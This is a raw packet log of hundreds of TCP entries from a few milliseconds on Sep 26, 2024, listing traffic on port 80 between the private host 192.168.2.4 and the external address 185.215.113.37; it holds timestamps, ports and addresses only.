Sep 26, 2024 00:39:03.545176983 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:03.545252085 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:03.545265913 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:03.545279026 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:03.545286894 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:03.545295000 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:03.545304060 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:03.545310020 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:03.545317888 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:03.545325041 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:03.545332909 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:03.545340061 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:03.545348883 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:03.545361996 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:03.545363903 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:03.545377016 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:03.545382023 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:03.545392990 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:03.545394897 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:03.545408964 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:03.545414925 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:03.545424938 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:03.545425892 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:03.545439005 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:03.545439959 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:03.545454025 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:03.545456886 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:03.545469046 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:03.545469999 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:03.545485020 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:03.545485973 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:03.545502901 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:03.545511961 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:03.545996904 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:03.546010971 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:03.546025991 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:03.546034098 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:03.546040058 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:03.546046972 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:03.546056986 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:03.546065092 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:03.546080112 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:03.546097994 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:03.546113968 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:03.546128035 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:03.546148062 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:03.546149969 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:03.546163082 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:03.546165943 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:03.546180964 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:03.546181917 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:03.546194077 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:03.546196938 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:03.546211004 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:03.546216965 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:03.546226978 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:03.546228886 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:03.546243906 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:03.546245098 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:03.546258926 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:03.546260118 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:03.546273947 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:03.546277046 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:03.546288967 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:03.546288967 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:03.546303988 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:03.546305895 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:03.546322107 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:03.546328068 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:03.546335936 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:03.546341896 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:03.546355963 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:03.546359062 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:03.546370029 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:03.546375990 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:03.546385050 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:03.546386957 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:03.546401978 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:03.546415091 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:03.546479940 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:03.546494961 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:03.546509981 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:03.546515942 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:03.546525002 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:03.546530008 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:03.546540022 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:03.546544075 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:03.546555996 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:03.546562910 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:03.546574116 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:03.546580076 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:03.546587944 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:03.546593904 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:03.546607018 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:03.546608925 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:03.546622992 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:03.546623945 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:03.546637058 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:03.546638012 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:03.546653986 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:03.546664000 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:03.546667099 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:03.546679020 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:03.546693087 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:03.546696901 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:03.546708107 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:03.546709061 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:03.546722889 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:03.546725035 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:03.546736956 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:03.546744108 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:03.546753883 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:03.546760082 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:03.546766996 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:03.546771049 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:03.546787024 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:03.546789885 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:03.546801090 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:03.546803951 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:03.546819925 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:03.546833992 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:03.549156904 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:03.549215078 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:03.549232006 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:03.549652100 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:03.549671888 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:03.549688101 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:03.549695969 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:03.549711943 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:03.549735069 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:03.549849033 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:03.549864054 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:03.549876928 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:03.549882889 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:03.549895048 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:03.549897909 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:03.549911976 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:03.549923897 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:03.549928904 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:03.549938917 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:03.549957037 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:03.549976110 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:03.550051928 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:03.550065994 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:03.550081015 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:03.550086975 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:03.550101042 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:03.550106049 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:03.550115108 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:03.550127983 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:03.550137043 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:03.550142050 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:03.550156116 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:03.550159931 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:03.550172091 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:03.550173998 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:03.550189018 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:03.550189972 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:03.550203085 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:03.550206900 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:03.550220966 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:03.550223112 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:03.550237894 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:03.550240993 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:03.550251961 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:03.550254107 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:03.550268888 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:03.550270081 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:03.550283909 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:03.550285101 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:03.550301075 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:03.550304890 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:03.550313950 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:03.550317049 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:03.550333977 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:03.550333977 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:03.550349951 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:03.550362110 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:03.551964045 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:03.551978111 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:03.551991940 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:03.552005053 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:03.552005053 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:03.552021980 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:03.552025080 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:03.552036047 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:03.552050114 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:03.552062035 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:03.552064896 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:03.552078962 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:03.552081108 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:03.552093029 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:03.552113056 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:03.552114010 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:03.552134991 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:03.552138090 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:03.552150965 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:03.552164078 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:03.552165031 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:03.552174091 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:03.552180052 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:03.552190065 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:03.552195072 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:03.552208900 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:03.552210093 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:03.552223921 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:03.552236080 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:03.552241087 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:03.552257061 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:03.552258015 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:03.552270889 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:03.552284956 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:03.552289963 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:03.552299023 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:03.552304983 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:03.552321911 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:03.552324057 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:03.552335978 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:03.552341938 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:03.552351952 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:03.552356958 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:03.552366972 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:03.552371025 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:03.552387953 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:03.552392006 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:03.552406073 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:03.552412033 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:03.552421093 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:03.552422047 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:03.552436113 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:03.552440882 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:03.552452087 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:03.552455902 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:03.552468061 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:03.552470922 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:03.552484035 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:03.552489996 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:03.552499056 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:03.552504063 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:03.552515030 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:03.552520990 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:03.552535057 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:03.552546024 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:03.552556038 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:03.552561045 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:03.552575111 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:03.552581072 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:03.552591085 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:03.552597046 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:03.552604914 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:03.552612066 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:03.552620888 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:03.552627087 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:03.552635908 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:03.552643061 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:03.552650928 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:03.552659035 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:03.552666903 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:03.552674055 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:03.552681923 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:03.552690983 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:03.552697897 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:03.552705050 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:03.552712917 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:03.552721024 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:03.552727938 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:03.552735090 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:03.552743912 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:03.552752018 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:03.552762985 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:03.552766085 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:03.552778006 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:03.552782059 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:03.552797079 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:03.552802086 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:03.552809954 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:03.552818060 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:03.552831888 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:03.552836895 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:03.552848101 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:03.552849054 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:03.552864075 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:03.552864075 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:03.552879095 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:03.552880049 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:03.552896976 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:03.552900076 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:03.552911043 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:03.552912951 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:03.552927971 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:03.552928925 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:03.552942038 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:03.552948952 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:03.552957058 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:03.552958012 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:03.552973032 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:03.552975893 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:03.552988052 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:03.552992105 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:03.553004026 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:03.553005934 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:03.553018093 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:03.553019047 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:03.553034067 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:03.553034067 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:03.553049088 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:03.553051949 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:03.553064108 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:03.553066969 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:03.553082943 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:03.553082943 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:03.553097963 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:03.553101063 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:03.553112030 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:03.553117990 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:03.553128004 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:03.553133011 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:03.553139925 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:03.553147078 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:03.553160906 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:03.553162098 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:03.553177118 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:03.553179026 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:03.553191900 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:03.553191900 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:03.553206921 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:03.553210974 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:03.553221941 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:03.553224087 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:03.553236008 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:03.553236961 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:03.553251982 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:03.553252935 CEST	49730	80	192.168.2.4	185.215.113.37
